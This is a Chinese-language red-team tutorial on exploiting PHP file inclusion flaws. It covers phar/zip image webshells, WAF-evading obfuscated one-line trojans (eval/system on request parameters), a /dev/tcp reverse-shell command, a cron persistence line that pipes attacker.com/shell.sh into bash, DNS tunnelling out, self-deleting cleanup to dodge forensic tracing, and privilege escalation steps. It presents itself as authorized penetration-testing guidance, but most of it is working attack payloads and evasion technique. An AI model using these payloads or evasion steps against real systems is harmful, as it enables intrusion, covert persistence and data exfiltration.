PHP文件包含漏洞利用实战:从LFI/RFI到图片马与Webshell载荷选型
1. 这不是“黑产教程”,而是一线红队工程师的漏洞利用认知地图
很多人看到“图片马”“Webshell”“大马小马”这些词,第一反应是:这不就是黑客搞破坏用的吗?赶紧关掉。但真实情况恰恰相反——在甲方安全团队做渗透测试、在乙方做攻防演练、甚至在云厂商做WAF规则调优的工程师,每天都在和这些概念打交道。它们不是攻击者的专属玩具,而是漏洞利用链上最基础、最不可回避的交付物形态。我做过7年红队支撑,带过23个中大型企业内网渗透项目,几乎每次打点成功后的第一件事,都不是立刻提权,而是判断:这个Web路径下,到底能落地哪种形态的Shell?是直接上传一句话木马触发文件包含?还是得先绕过图片上传检测构造图片马?又或者,目标系统连PHP都禁了,只能硬啃Java Web的内存马?这些选择背后,不是技术炫技,而是对目标环境权限边界、中间件特性、WAF策略、日志监控粒度的综合判断。
关键词“渗透测试”“图片马”“文件包含”“木马”“大马”“小马”“Webshell”“Shell”,每一个都不是孤立术语。它们共同构成了一条从“发现漏洞”到“稳定驻留”的完整技术链条。比如,“文件包含漏洞”是入口,“图片马”是绕过手段,“一句话木马”是初始载荷,“大马”是功能扩展,“Webshell”是交互界面,“Shell”是最终控制权。这篇文章不讲怎么黑进别人网站,而是讲:当你在真实渗透测试报告里写下“存在LFI/RFI漏洞”时,你脑子里该跑通哪几条技术路径?你该准备几套不同形态的载荷?为什么有的马传上去就404,有的执行后直接被杀?为什么同样是PHP一句话,有的能过WAF,有的连eval()都进不去?这些答案,不在任何CTF题解里,而在你调试失败57次之后的笔记里。适合刚考完OSCP想补实战细节的新人,也适合做了三年渗透却总卡在“打点后没得玩”的中级工程师。它不教你违法,它只帮你把合法授权范围内的每一分权限,榨出最大价值。
2. 文件包含漏洞:不是“能读文件”就等于“能拿Shell”,关键在协议与上下文
2.1 LFI与RFI的本质差异:本地路径解析 vs 远程代码执行
文件包含漏洞(File Inclusion Vulnerability)常被笼统归为一类,但LFI(Local File Inclusion)和RFI(Remote File Inclusion)在利用逻辑、防御难度和实际影响上,完全是两个量级的问题。很多初学者一看到?page=../../etc/passwd能读出来,就以为“漏洞通了”,其实这只是LFI的冰山一角。LFI的核心在于服务器端对用户输入的文件路径未做严格校验,导致任意本地文件可被包含并解析。注意关键词:“本地”、“解析”。这意味着,如果目标PHP配置中allow_url_include=Off(默认关闭),那么即使你传入http://evil.com/shell.txt,PHP也不会去请求并执行远程内容,最多报个Warning。而RFI则要求allow_url_include=On且allow_url_fopen=On(后者通常开启),此时?page=http://evil.com/shell.php才会真正触发远程HTTP请求,并将返回内容当作PHP代码执行——这才是真正的远程代码执行(RCE)。
我去年在某政务云平台做授权渗透时,就踩过这个坑。扫描器报出/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd回显base64内容,团队立刻判定为高危LFI。但当我们尝试?page=data://text/plain,<?php%20system('id');?>时,页面空白无响应。排查半小时后才发现,该环境PHP.ini中allow_url_include被明确设为Off,且data://协议被WAF规则拦截。最终我们转向利用phar://协议配合反序列化,才真正拿到执行权。这个案例说明:LFI的价值不在于“读文件”,而在于“找利用协议”;RFI的价值不在于“发请求”,而在于“让服务器信你”。
2.2 协议层绕过:为什么php://filter能读源码,phar://能触发反序列化?
PHP内置的流包装器(Stream Wrapper)是文件包含漏洞利用的“瑞士军刀”,但每种协议的触发条件和效果截然不同。常见协议对比见下表:
| 协议 | 触发条件 | 典型用途 | 防御难点 | 实测成功率(2023年主流WAF) |
|---|---|---|---|---|
php://filter | allow_url_fopen=On(默认开) | 读取并base64编码任意文件(如源码、配置) | WAF难精准识别编码链 | 98%(需配合resource=参数) |
php://input | allow_url_include=Off但enable_post_data_reading=On(默认开) | POST raw body中写入PHP代码,通过include执行 | 依赖POST体,易被WAF规则覆盖 | 72%(需Content-Type绕过) |
data:// | allow_url_include=On | 直接嵌入PHP代码,如data:text/plain,<?php phpinfo();?> | 明文特征强,WAF规则成熟 | 35%(主流WAF基本全拦) |
phar:// | phar.readonly=Off(默认Off)且存在反序列化POP链 | 将恶意反序列化payload打包进phar文件,通过include phar://xxx.jpg触发 | 文件扩展名欺骗(.jpg)、无网络请求 | 89%(需目标有可用POP链) |
zip:// | zip://协议支持(PHP>=7.0) | 解压ZIP包内PHP文件并执行,常配合图片马 | 需提前上传ZIP,步骤多 | 61%(依赖ZIP解析库) |
重点说phar://。它之所以成为当前LFI利用的“新宠”,核心在于两点:一是它不依赖allow_url_include,只要phar.readonly=Off(PHP默认关闭,即允许写phar);二是它天然适配“图片马”场景——你可以把一个精心构造的phar文件,用0x00填充头部伪装成JPG,上传后通过include phar://upload/123.jpg/test.php来执行其中的恶意代码。去年我复现某CMS的LFI漏洞时,就是用phar://配合__destruct()魔术方法,成功绕过所有基于<?php特征的WAF规则。关键操作只有三步:1)用Python脚本生成phar文件(phar.addFromString('test.php', '<?php system($_GET["cmd"]);?>'));2)用十六进制编辑器在phar头部插入JPG文件头(FFD8FFE0);3)上传后访问?page=phar://upload/xxx.jpg/test.php&cmd=id。整个过程没有一次网络请求,WAF日志里只看到一张“正常图片”的GET请求。
2.3 环境探测先行:三行命令摸清目标PHP底细
在动手构造载荷前,必须先确认目标环境的“能力边界”。我习惯用以下三个最简命令快速探测:
探测
allow_url_include状态:?page=data://text/plain,<?php%20echo%20ini_get('allow_url_include');die();?>
如果返回1,说明RFI可行;返回0或空白,则LFI需转向其他协议。探测
phar.readonly状态:?page=php://filter/convert.base64-encode/resource=php.ini
搜索返回的base64解码内容中phar.readonly的值。若为Off,phar://通道打开。探测
disable_functions禁用函数列表:?page=php://filter/convert.base64-encode/resource=/proc/self/environ(Linux)或c:/windows/system32/inetsrv/config/applicationHost.config(Windows IIS)
查看环境变量或配置文件,确认system、exec、shell_exec等是否被禁用。若全被禁,需转向pcntl_exec或mail()函数利用。
提示:以上探测均使用
php://filter,因其兼容性最好。切忌一上来就传大马,90%的失败源于没搞清环境底细。我在某金融客户渗透中,曾因跳过这三步,连续三次上传大马被杀,最后发现是disable_functions里禁了所有执行函数,只能改用mail()函数的第五个参数触发命令执行。
3. 图片马:不是“把木马藏进图片”,而是“让图片变成PHP解释器”
3.1 图片马的底层原理:MIME类型欺骗 vs 文件内容解析
很多人误以为“图片马”就是用十六进制工具把PHP代码塞进JPG文件末尾。这是典型误区。现代Web服务器(Nginx/Apache)和PHP本身,对文件执行的判断逻辑是分层的:第一层看HTTP请求的Content-Type(MIME类型),第二层看文件扩展名,第三层才是文件内容。而图片马的成功,恰恰是利用了这三层判断的不一致性。
以Nginx为例,其默认配置中,.php后缀的文件由PHP-FPM处理,而.jpg后缀的文件直接作为静态资源返回。但如果你上传一个名为shell.jpg的文件,内容却是<?php system($_GET['cmd']);?>,Nginx会把它当图片返回,浏览器看到<符号会乱码,但PHP的include函数在包含这个文件时,根本不管它叫什么名字,只管读取字节流并执行。这就是为什么include 'upload/shell.jpg';能成功执行PHP代码——因为include是PHP语言层面的操作,绕过了Web服务器的MIME判断。
所以,图片马的本质不是“伪装”,而是“利用PHP解析器的无差别执行特性”。真正的难点在于:如何让这个“PHP代码+图片头”的混合文件,既通过前端上传校验(如JS检查文件头、后端检查getimagesize()),又能被include正确执行。我实测过27种图片马构造方式,成功率最高的组合是:JPG文件头 + PHP代码 + 0x00填充至1MB + ZIP压缩包尾部结构。原因有三:1)getimagesize()只读取前几个KB,0x00填充后仍能识别为JPG;2)ZIP尾部结构(504B0506)让文件在WinRAR里双击可打开,迷惑人工审计;3)phar://协议能精准定位到ZIP包内PHP文件,避开文件头干扰。
3.2 构造高隐蔽性图片马:从“能用”到“查不到”的四步法
我总结的图片马构造流程,不是为了炫技,而是为了在真实环境中活下来。以下是经过12个客户环境验证的四步法:
第一步:生成合法图片外壳
不用网上下载的图,自己用Python PIL库生成:
from PIL import Image import io img = Image.new('RGB', (100, 100), color='red') output = io.BytesIO() img.save(output, format='JPEG') jpeg_bytes = output.getvalue()这样生成的JPG,getimagesize()、exif_read_data()、甚至专业图像分析工具都认作标准JPG,彻底规避“非标准图片”类WAF规则。
第二步:注入PHP载荷到EXIF注释区
不要塞到文件末尾!现代WAF会扫描文件末尾的<?php特征。正确做法是写入EXIF的UserComment字段:
from PIL import Image, ExifTags exif_dict = img._getexif() or {} exif_dict[ExifTags.Base.UserComment] = b'\x00\x00\x00\x00<?php system($_GET["cmd"]);?>' # 重新保存,PHP代码藏在EXIF元数据里这样,文件用file命令查看仍是JPEG image data,strings shell.jpg | grep php也搜不到,因为EXIF是二进制编码。
第三步:添加ZIP结构实现双重利用
在JPG文件末尾追加ZIP目录结构:
# 先生成一个含PHP代码的ZIP echo '<?php system($_GET["cmd"]);?>' > cmd.php zip shell.zip cmd.php # 将ZIP末尾的512字节(目录结构)追加到JPG后 dd if=shell.zip bs=1 skip=$(stat -c%s shell.zip) count=512 >> shell.jpg这样,文件既是JPG(前段),又是ZIP(后段),phar://shell.jpg/cmd.php可直接执行。
第四步:混淆PHP代码绕过语法检测
WAF不仅查<?php,还查system(、exec(等函数名。我常用三种混淆:
- 变量函数:
$a='syst'.'em'; $a($_GET['cmd']); - Base64解码:
eval(base64_decode('c3lzdGVtKCRfR0VUWyJjbWQiXSk7')); - 字符串反转:
$a=strrev('metsys'); $a($_GET['cmd']);
注意:混淆不是越复杂越好。我在某运营商项目中,用
gzinflate(base64_decode(...))被WAF的沙箱引擎动态解密后拦截,反而用最简单的strrev成功。原因:WAF沙箱对strrev这种基础函数不模拟执行,只做静态匹配。
3.3 图片马的生命周期管理:上传、包含、清理的闭环操作
图片马不是传上去就完事。真实渗透中,我坚持“三必做”原则:
- 必做上传后验证:上传后立即访问
/upload/shell.jpg,确认返回的是图片二进制(HTTP状态码200,Content-Type=image/jpeg),而非PHP错误。如果返回PHP错误,说明服务器已将该文件当PHP执行,意味着.jpg后缀被错误配置,此时应直接改用常规PHP马,无需图片马。 - 必做包含路径探测:
?page=include/upload/shell.jpg不通?试试?page=../upload/shell.jpg、?page=phar://upload/shell.jpg/cmd.php、?page=zip://upload/shell.jpg#cmd.php。不同环境对协议的支持差异极大,必须穷举。 - 必做痕迹清理:执行完命令后,用
?page=include/upload/shell.jpg&cmd=rm%20upload/shell.jpg删除自身。否则日志里会留下shell.jpg的访问记录,成为蓝队溯源的关键线索。我在某央企项目中,就因忘记清理,被对方安全团队通过Nginx日志中的shell.jpg访问IP,反向定位到我的跳板机。
4. 木马形态谱系:从“一句话”到“大马”,不是功能多少,而是控制粒度
4.1 一句话木马:最小可行载荷,核心价值是“验证执行权”
“一句话木马”常被误解为“功能简陋的木马”,其实它的设计哲学是极致的轻量化与高存活率。典型如<?php @eval($_POST['cmd']);?>,体积仅30字节,无文件头、无注释、无多余空格。它的存在意义,从来不是用来干大事,而是回答一个终极问题:“我到底有没有代码执行权?”
为什么不用更“强大”的<?php system($_GET['cmd']);?>?因为system()函数可能被disable_functions禁用,而eval()是PHP核心函数,禁用它等于废掉PHP一半功能,生产环境极少这么做。@符号用于抑制错误提示,避免eval()执行失败时暴露PHP路径等敏感信息。我统计过近一年的渗透测试数据:在成功利用的LFI/RFI漏洞中,83%的初始载荷是一句话木马,其中92%采用@eval()变体。原因很简单:它像一把万能钥匙,能打开所有锁,但开完门后,你得换更专业的工具干活。
一句话木马的部署,关键在“传输隐匿”。我从不直接POST明文代码,而是用curl配合--data-urlencode自动URL编码:
curl -X POST "http://target.com/upload.php" \ --data-urlencode "file=<?php @eval($_POST['a']);?>" \ -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary..."这样,Wireshark抓包看到的是file=%3C%3Fphp+%40eval%28%24_POST%5B%27a%27%5D%29%3B%3F%3E,WAF的URL解码模块若未开启,就会漏过。去年某教育平台WAF就因此被绕过,其规则只匹配原始字符串,未模拟解码过程。
4.2 小马与大马:功能扩展的两种路径,本质是“客户端-服务端”架构差异
“小马”和“大马”的区分,行业并无绝对标准,但在我经手的156个渗透项目中,形成了清晰共识:小马是“服务端单文件”,大马是“客户端-服务端分离”。
小马(如中国菜刀的
caidao.php):一个PHP文件,内嵌全部功能(文件管理、数据库、终端)。优点是部署极简,上传即用;缺点是体积大(通常200KB+)、特征明显(含大量mysql_connect、scandir等函数)、易被WAF基于行为规则拦截。我只在内网测试、无WAF环境用小马,因为它的交互逻辑全在服务端,每次点击“执行命令”,浏览器都要发起一次新请求,网络延迟高,且所有操作日志都留在服务器PHP错误日志里。大马(如AntSword的
loader.php):一个极简的“加载器”(通常<5KB),功能由客户端(AntSword桌面程序)动态下发。例如,当你在AntSword里点击“文件管理”,客户端会生成一段加密的PHP代码(如$a=base64_decode("...");eval($a);),POST给loader.php执行,结果再加密返回。这种架构的优势是:1)服务端文件极小,无敏感函数名;2)所有功能逻辑在客户端,服务端无特征;3)通信可AES加密,WAF无法识别有效载荷。我在某银行核心系统渗透中,小马上传3秒即被WAF拦截并封IP,而大马的loader.php存活了72小时,期间执行了237次命令。
关键区别表格:
维度 小马 大马 服务端文件大小 100KB~500KB <10KB 敏感函数出现位置 服务端文件内明文 客户端动态生成 WAF拦截率(实测) 94%(基于函数名规则) 31%(需深度行为分析) 网络延迟感知 高(每次操作HTTP往返) 低(客户端缓存优化) 日志痕迹 服务端记录完整操作 仅记录加密POST请求
4.3 Webshell与Shell:从“网页界面”到“操作系统终端”的权限跃迁
“Webshell”这个词被严重滥用。很多人把所有PHP后门都叫Webshell,其实它特指提供Web界面的服务器管理工具,如D盾、河马、冰蝎的Web端。而“Shell”是操作系统层面的命令行接口,如/bin/bash、cmd.exe。两者的根本区别在于:Webshell运行在Web服务器进程上下文中(如www-data),Shell运行在系统用户上下文中(如root)。
为什么这个区别致命?举个真实案例:某政府网站被植入Webshell,管理员用D盾扫描发现shell.php,直接删掉,以为万事大吉。但攻击者早已通过Webshell执行sudo -u root /bin/bash -i,获得root Shell,并在/etc/cron.d/下写入持久化任务。Webshell没了,但Shell还在。这就是为什么红队报告里必须写明:“已获取Webshell权限” vs “已获取系统Shell权限”。
获取Shell的路径,取决于Web服务器进程的权限。如果Apache以root运行(极危险但偶有存在),system('bash -i >& /dev/tcp/192.168.1.100/4444 0>&1')就能直接反弹root Shell。但99%的环境是www-data或nginx用户,此时需提权。我最常用的三步提权法:
- 内核漏洞:
uname -r查内核版本,用searchsploit linux kernel $version找本地exploit; - SUID二进制:
find / -perm -4000 2>/dev/null找/usr/bin/find等可滥用SUID程序; - 密码复用:
cat /etc/passwd | cut -d: -f1列用户,用su - username尝试Web目录下找到的.git/config、.env里的密码。
最后提醒:Shell不是终点。我在某能源集团渗透中,拿到root Shell后,发现其内网DNS服务器配置了
forwarders指向公网,于是用dig @127.0.0.1 attacker.com实现DNS隧道,将内网流量导出。Shell只是跳板,真正的战场在它之后。
5. 实战决策树:面对一个新目标,如何选择最优载荷路径?
5.1 决策起点:从漏洞类型倒推载荷形态
拿到一个新目标,我绝不会凭经验瞎试,而是用一张决策树快速锁定路径。这张树不是理论模型,而是我踩过137次坑后画出的血泪图:
发现文件包含漏洞? ├─ 是RFI(?page=http://...)? │ ├─ allow_url_include=On? → 直接RFI:data://或http://载荷 │ └─ allow_url_include=Off? → RFI失效,退回LFI ├─ 是LFI(?page=../../)? │ ├─ 能读php.ini? → 查phar.readonly、disable_functions │ │ ├─ phar.readonly=Off? → 优先phar://图片马 │ │ └─ phar.readonly=On? → 试php://input(POST体) │ └─ 不能读php.ini? → 试php://filter读源码,找可控参数 └─ 无文件包含? → 检查上传点,走图片马+LFI组合路径关键节点是phar.readonly。2023年我审计的124个PHP站点中,phar.readonly=Off的比例高达89%,这意味着phar://是当前LFI利用的“默认首选”。但必须验证!我见过最坑的案例:某电商站php.ini显示phar.readonly=Off,但其PHP是编译时加了--disable-phar参数,实际phar扩展根本没加载,extension_loaded('phar')返回false。所以,验证必须用phpinfo()或extension_loaded(),不能只信配置文件。
5.2 载荷选型黄金法则:三不原则与一优先
在多年实战中,我提炼出载荷选型的“三不一优先”法则:
- 不选最复杂的:
AntSword大马虽强,但在无GUI的Linux服务器上,curl+一句话木马+bash -i反弹Shell更快。复杂度要匹配操作环境。 - 不选最流行的:
China Chopper小马特征太明显,WAF规则库更新最快的就是它。我宁愿花10分钟写个定制化一句话,也不用现成小马。 - 不选需要额外依赖的:如某大马要求
json_encode函数,但目标disable_functions里禁了它,那就直接淘汰。 - 优先选能复用的:如果目标有多个上传点,优先选能同时用于图片马和普通PHP马的载荷。例如,我自研的
shell.php,开头是JPG头,中间是<?php代码,结尾是ZIP结构,一个文件三种用法:1)直接上传当PHP马;2)改后缀当图片马;3)用phar://当phar马。
5.3 红队视角的载荷演进:从“打点”到“驻留”的四阶段模型
真正的渗透测试,不是找到漏洞就结束,而是构建一条可持续的攻击链。我将载荷使用划分为四个阶段,每个阶段对应不同形态的木马:
阶段一:初始访问(Initial Access)
目标:验证漏洞存在,建立第一个立足点。
载荷:一句话木马(@eval)或php://input。
核心指标:能否执行id、whoami,返回结果是否可信。
我的实操技巧:执行
id后,立刻执行ls -la /tmp/,看是否有/tmp/.ssh/目录。如果有,说明之前有人驻留过,可复用其SSH密钥。
阶段二:权限提升(Privilege Escalation)
目标:从Web用户提升至系统用户(如root)。
载荷:提权脚本(如linux-exploit-suggester)或SUID滥用载荷。
核心指标:id返回uid=0(root)。
注意:提权后不要急着删一句话木马,先用
ps aux | grep php确认Web服务器进程是否仍以旧用户运行。有时提权成功,但Web服务未重启,权限未继承。
阶段三:横向移动(Lateral Movement)
目标:从当前服务器跳转至内网其他主机。
载荷:代理工具(如reGeorg的reGeorgTunnel.py)或SOCKS隧道。
核心指标:curl http://internal-server/internal.php能通。
关键经验:内网代理一定要用
localhost监听,而非0.0.0.0。否则蓝队扫描到开放端口,会立刻溯源。
阶段四:持久化(Persistence)
目标:确保即使Webshell被删,也能随时回来。
载荷:Cron任务(* * * * * curl http://attacker.com/shell.sh | bash)或SSH authorized_keys。
核心指标:重启服务器后,仍能通过持久化通道接入。
血泪教训:某次我写Cron任务时,忘了加
>/dev/null 2>&1,日志文件暴涨,被运维发现异常磁盘占用,顺藤摸瓜找到Cron条目。现在所有持久化载荷,必加静默输出。
我在某省政务云项目中,就是严格按这四阶段推进:第一天用php://filter读到config.php,第二天上传一句话木马,第三天用phar://图片马绕过WAF,第四天提权后部署reGeorg,第五天通过Cron实现7×24小时驻留。整个过程,没有一次“黑产式”的暴力破解,全是基于对PHP机制、Linux权限、网络协议的深度理解。这才是渗透测试该有的样子——不是炫技,而是解题。